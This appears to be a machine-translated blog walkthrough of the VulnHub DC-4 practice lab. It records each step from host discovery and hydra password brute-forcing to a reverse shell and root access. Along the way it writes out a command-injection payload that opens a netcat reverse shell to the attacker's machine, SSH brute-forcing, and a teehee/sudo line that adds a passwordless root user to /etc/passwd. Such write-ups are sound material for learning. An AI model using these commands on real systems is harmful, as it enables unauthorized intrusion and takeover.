当前位置:网站首页>【Try to Hack】vulnhub DC4
【Try to Hack】vulnhub DC4
2022-07-01 17:31:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 7 month 1 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
The target is in bridging mode by default
kali Set to bridge mode
The host found netdiscover
Drone aircraft ip by 192.168.0.151
namp -p- -A 192.168.0.151
ssh Service and http service
visit 80 port 
dirb Regular directory scanning dirb http://192.168.0.151
Two directories 403
whatweb http://192.168.0.151
This page doesn't work cwel Crawl dictionary
Upper weak password
On hydra, use john A dictionary with me /usr/share/john/password.lst
Known user name is adminhydra -l admin -P /usr/share/john/password.lst 192.168.0.151 http-get /


Can execute orders , But the command is dead
Grab the bag and have a look 
Yes indeed 
Bounces shellradio=nc+192.168.0.106+233+-e+/bin/sh&submit=Run
nc -lvvp 233
Pack 
python -c 'import pty;pty.spawn("/bin/bash")'
Get an interactive shell
ls /home
There are three users 
Turn over one by one
Only jim Can see 

Password 
Continue to turn jim Other documents under 
No permission to view mbox
Now look ssh service
Then save the three users as user.txt.
I directly copied the password backup file to kali In the attack plane
use hydra Blast ssh service hydra -L user.txt -P password.txt 192.168.0.151 ssh -t 60 
ssh Blast out a user
jim:jibril04
Log in and have a look ssh [email protected]
Login successful
You can see mbox
This is email ,root to jim Email sent , But there is no email content
stay /var/jim Found inside .( This /var/mail Is the default self-contained folder , It may be used to save emails )
Got it charles Password
Log in 

nothing
Now we can only consider raising the right
To us charles This user , Then use this user to raise rights 
test.sh have suid jurisdiction , But I don't know when it will run , I haven't seen it work .
First, consider using ping Raise the right , But it doesn't seem to work
use sudosudo -l

echo "happy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Construct a user with root jurisdiction , write in /etc/passwd

边栏推荐
- FRP intranet penetration, reverse proxy
- DNS
- 【Try to Hack】vulnhub DC4
- Mysql database - Advanced SQL statement (2)
- China BMS battery management system Market Research Report (2022 Edition)
- 中国氮化硅陶瓷基板行业研究与投资前景报告(2022版)
- Pyqt5, draw a histogram on the control
- Encryption and decryption of tinyurl in leetcode
- China acetonitrile market forecast and strategic consulting research report (2022 Edition)
- Determine whether the linked list is a palindrome linked list
猜你喜欢

Intel's open source deep learning tool library openvino will increase cooperation with local software and hardware parties and continue to open

Gold, silver and four want to change jobs, so we should seize the time to make up

How wild are hackers' ways of making money? CTF reverse entry Guide

6月刊 | AntDB数据库参与编写《数据库发展研究报告》 亮相信创产业榜单

SQL question brushing 584 Looking for user references

走进微信小程序

DNS

【Try to Hack】vulnhub DC4

【牛客网刷题系列 之 Verilog快速入门】~ 优先编码器电路①

SQL question brushing 1050 Actors and directors who have worked together at least three times
随机推荐
[C language supplement] judge which day tomorrow is (tomorrow's date)
Redis 分布式鎖
【C语言基础】12 字符串
Intel's open source deep learning tool library openvino will increase cooperation with local software and hardware parties and continue to open
LeetCode中等题之TinyURL 的加密与解密
How to use JMeter function and mockjs function in metersphere interface test
vulnhub靶场-hacksudo - Thor
Openlayers customize bubble boxes and navigate to bubble boxes
(1) CNN network structure
JDBC:深入理解PreparedStatement和Statement[通俗易懂]
多线程使用不当导致的 OOM
中国锦纶长丝缝纫线发展预测与投资方向研究报告(2022版)
拼接字符串,得到字典序最小的结果
China PBAT resin Market Forecast and Strategic Research Report (2022 Edition)
如何使用 etcd 实现分布式 /etc 目录
Depth first traversal and breadth first traversal [easy to understand]
股票万1免5证券开户是合理安全的吗,怎么讲
Countdownlatch blocking wait for multithreading concurrency
Machine learning 11 clustering, outlier discrimination
Report on research and investment prospects of China's silicon nitride ceramic substrate industry (2022 Edition)